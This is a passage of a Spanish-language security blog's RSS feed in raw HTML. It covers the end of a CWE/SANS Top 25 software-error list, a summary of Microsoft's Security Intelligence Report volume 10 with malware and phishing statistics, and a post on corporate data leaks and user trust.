href="http://cwe.mitre.org/top25/?2011#CWE-190"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-190&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Desbordamiento de enteros&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 25; mso-yfti-lastrow: yes;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[25]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;59.9&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-759"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-759&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Aplicar una función hash sin usar la sal&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="font-family: Calibri, sans-serif; font-size: 11pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="font-family: Calibri, sans-serif; font-size: 11pt;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;a href="http://cwe.mitre.org/top25/archive/2011/2011_cwe_sans_top25.pdf"&gt;Aquí&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="color: #376092; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;span style="color: windowtext;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;tienes toda la información en PDF&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-3006440703964479539?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/los-25-errores-mas-peligrosos-en.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-4961855330397022819</guid><pubDate>Mon, 11 Jul 2011 14:34:00 +0000</pubDate><atom:updated>2011-07-11T10:34:28.998-04:00</atom:updated><title>Microsoft Security Intelligence Report 10</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Después de analizar 600 millones de computadoras en todo el mundo, Microsoft publicó el volumen 10 de su Informe de Inteligencia de Seguridad (SIR), el cual puede ser descargado desde aquí &lt;a href="http://download.microsoft.com/download/8/E/0/8E0A1D5A-7DF6-4A4F-AB97-7E12043E7368/Microsoft_Security_Intelligence_Report_volume_10_July-Dec2010_Spanish.pdf"&gt;http://download.microsoft.com/download/8/E/0/8E0A1D5A-7DF6-4A4F-AB97-7E12043E7368/Microsoft_Security_Intelligence_Report_volume_10_July-Dec2010_Spanish.pdf&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span class="apple-style-span"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Se centra en el malware, vulnerabilidades de software revelaciones de explotación de vulnerabilidades, y tendencias relacionadas. La mayoría de las vulnerabilidades en el 2010 fueron encontradas en las aplicaciones.&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Java encabezó la lista de categorías con la cantidad de scripts dañinos creados, Adobe Acrobat Reader tuvo el mayor número de vulnerabilidades y Windows 7 y Windows Server 2008 R2 tuvieron la menor tasa de infección de sistema operativo.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Dentro de este panorama se encuentran dos tipos de conducta criminal, por un lado está un pequeño número de criminales sofisticados cuyos motivos varían desde los ataques generales hasta los específicos. Este tipo de agresores suelen tener una inteligencia especial sobre el entorno de su objetivo, hacen uso personalizado de ingeniería social para engañar a las víctimas o explotan las vulnerabilidades descubiertas más recientes en el software para comprometer las redes y los sistemas.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Por otro lado, están aquellos que aprovechan métodos de ataque más accesible, en algunos casos originalmente creado por los delincuentes más expertos, junto con la ingeniería social para tomar una pequeña cantidad de dinero de un gran número de personas. Las tácticas de ingeniería social implican engañar a las personas con un software de seguridad falso “Rogue Security Software” el cual se presenta como un producto para la protección legítima, se hacen pasar por amigos para robar contraseñas de cuentas de juegos en línea, realizan phishing a través de redes sociales y engañan a los usuarios para descargar el adware.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Software de Seguridad Falso (Rogue Security Software&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;): fue detectado y bloqueado a casi 19 millones de sistemas en 2010, y las primeras cinco familias fueron responsables de aproximadamente 13 millones de estas detecciones.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Phishing&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;i&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;:&lt;/span&gt;&lt;/i&gt;&lt;span class="apple-converted-space"&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;utilizando redes sociales como señuelo aumentó 1.200 % (de un mínimo de 8,3% de todos los "phishing" en enero y una máxima de 84,5 por ciento en diciembre de 2010). Phishing dirigido a sitios de juegos en línea alcanzó un máximo del 16,7 por ciento de todos los "phishing" en junio.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Adware&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;i&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;:&lt;/span&gt;&lt;/i&gt;&lt;span class="apple-converted-space"&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;La detección mundial de navegación en la web aumentó en un 70%, desde el segundo trimestre al cuarto trimestre de 2010. Este aumento se debió casi por completo por la detección de un par de nuevas familias de adware, JS / Pornpop y Win32/ClickPotato, que son los dos programas maliciosos más comunes en muchos países.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;A continuación les dejo alguno de los números expuestos en el informe.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-CER1JR4iENw/ThsJX5-gxyI/AAAAAAAAALk/uopWgVQDX90/s1600/porcentaje.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="218" src="http://2.bp.blogspot.com/-CER1JR4iENw/ThsJX5-gxyI/AAAAAAAAALk/uopWgVQDX90/s320/porcentaje.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;b&gt;&lt;span style="color: #333333; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Tendencias de vulnerabilidades según plataformas&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-A6YXUpzooWE/ThsJXLr1h2I/AAAAAAAAALg/8nAuf6i96g8/s1600/por_SO.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://2.bp.blogspot.com/-A6YXUpzooWE/ThsJXLr1h2I/AAAAAAAAALg/8nAuf6i96g8/s320/por_SO.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;b&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Divulgaciones de vulnerabilidad en toda la industria por gravedad, 2006–2010&lt;span style="color: #333333;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-VlSSvyEl02g/ThsJWKOc6oI/AAAAAAAAALY/fVs8kZtlF88/s1600/divulga.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://4.bp.blogspot.com/-VlSSvyEl02g/ThsJWKOc6oI/AAAAAAAAALY/fVs8kZtlF88/s320/divulga.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;b&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Divulgaciones de vulnerabilidad en toda la industria en 2010, por gravedad&lt;span style="color: #333333;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-e_dnCLY-RJA/ThsJWmM_WwI/AAAAAAAAALc/UceespqBYN8/s1600/gravedad.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://2.bp.blogspot.com/-e_dnCLY-RJA/ThsJWmM_WwI/AAAAAAAAALc/UceespqBYN8/s320/gravedad.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;b&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Vulnerabilidades de seguridad detectadas por los productos antimalware de escritorio de Microsoft en 2010, agrupadas por plataforma o tecnología objetivo&lt;span style="color: #333333;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-uPeveZ3WiEQ/ThsJVjXY7ZI/AAAAAAAAALU/AqN7XhpVLmI/s1600/detectadas.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://1.bp.blogspot.com/-uPeveZ3WiEQ/ThsJVjXY7ZI/AAAAAAAAALU/AqN7XhpVLmI/s320/detectadas.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-4961855330397022819?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/microsoft-security-intelligence-report.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-CER1JR4iENw/ThsJX5-gxyI/AAAAAAAAALk/uopWgVQDX90/s72-c/porcentaje.jpg" height="72" width="72" /></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-7921711969714043595</guid><pubDate>Fri, 08 Jul 2011 19:19:00 +0000</pubDate><atom:updated>2011-07-08T15:24:21.411-04:00</atom:updated><title>Fuga de Información - Tarea de todos</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;b&gt;Comentarios: &lt;/b&gt;pramirezh[at]gmail_dot_com&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Desde&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;&lt;a href="http://wikileaks.org/" title="Wikileaks -  Robo de información"&gt;&lt;strong&gt;&lt;span style="color: #0a5692; font-family: Calibri, sans-serif; text-decoration: none;"&gt;Wikileaks&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;, a finales del 2010, la&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;seguridad de la información&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;es un tema que ha “vuelto” a estar en boca de todos. Pero&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;Wikileaks&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;es solo la punta del iceberg. Desde ese entonces hasta el día de hoy hemos sido testigos de distintos casos de&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;fuga de información, &lt;a href="http://www.theinquirer.es/2011/06/13/el-fmi-sufre-un-ataque-%E2%80%9Csofisticado-y-grave%E2%80%9D.html"&gt;FMI&lt;/a&gt;, &lt;a href="http://pastebin.com/tkmZDG9m"&gt;Apple&lt;/a&gt;, &lt;a href="http://www.theregister.co.uk/2011/06/09/citibank_hack_attack/"&gt;CitiGroup&lt;/a&gt;, &lt;a href="http://gadgetwise.blogs.nytimes.com/2011/03/18/rsas-secure-ids-hacked-what-to-do/"&gt;RSA&lt;/a&gt;, etc, en donde a través de un ataque informático, infección de un código malicioso u otras tantas causas, datos importantes de compañías fueron publicados en la web.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Ser víctimas de la fuga de información, es un tema que preocupa tanto a los usuarios como a las empresas y es debido a ello que suelen tomar recaudas para proteger su información. Para los usuarios la fuga de información es un tema muy importante, y el 67,7% de los usuarios está preocupado acerca de la posibilidad de que sus datos sean expuestos sin su consentimiento, según una encuestas de ESET.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Los usuarios tratan de proteger su información de la mejor manera posible a través del uso de soluciones antivirus, con firewalls y contraseñas fuertes, pero, ¿qué pasa cuando su información es protegida por alguien más? Cuando la información del usuario es relegada a un empresa que ofrece un servicio, son ellos quienes se comprometen a proteger sus datos, pero si la seguridad de la empresa se ve vulnerada, ¿qué hace el usuario?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Cuando una empresa que ofrece un servicio y se ve afectada por el robo de información, esto impacta de manera directa en la confianza de sus clientes. Según los resultados de la encuesta, ante un caso de robo de información, el 62,9% de los usuarios dejaría de utilizar el servicio, es decir que la&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;empresa perdería a 6 de cada 10 clientes&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;por no proteger bien su información.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-BRrG5UnuvNA/ThdX9DqfruI/AAAAAAAAAKg/KmCRG6mxiK8/s1600/eset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="276" src="http://1.bp.blogspot.com/-BRrG5UnuvNA/ThdX9DqfruI/AAAAAAAAAKg/KmCRG6mxiK8/s400/eset.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Además de la cancelación del servicio el usuario se ve involucrado en otras tareas, como la cancelación de su tarjeta de crédito y&amp;nbsp; el cambio de contraseña, esta secuencia de acciones deben ser tenidas en cuenta para evitar pérdidas monetarias o el&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.identidadrobada.com/estadisticas-sobre-robo-de-identidad-infografia/" title="El robo de identidad y sus cifras en América Latina"&gt;&lt;span style="color: #0a5692;"&gt;robo de identidad&lt;/span&gt;&lt;/a&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Una vez que la información es robada, suele ser&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;comercializada por los atacantes&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;a través de portales en donde&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;los datos de los usuarios tienen un precio&lt;/span&gt;&lt;/strong&gt;. Uno de los problemas del robo de información acarrea es la suplantación de identidad. Por ejemplo, en lo referido esta temática, las estadísticas indican que&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;4 de cada 10 personas&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space"&gt;&amp;nbsp;&lt;/span&gt;tardan alrededor de tres meses hasta notar el incidente, e incluso el 18% tarda más de 4 años en hacerlo.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Durante todo el tiempo que transcurre hasta que una víctima se da cuenta de que su información ha sido robada se encuentra expuesta a que un atacante realice acciones malintencionadas en nombre de él.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;No existe un patrón que diga quién es más vulnerable a ser víctima del robo de información, pero los usuarios opinan que los quienes más expuestos están son las grandes empresas y las entidades bancarias. Esto está relacionado por la importancia de la información que gestionan.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;El robo de información es una cuestión que involucra tanto a usuarios como a empresas y es en conjunto que a través del uso de herramientas tecnológicas, una correcta gestión y la educación se pueden minimizar estos sucesos y así evitar que información confidencial sea expuesta.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
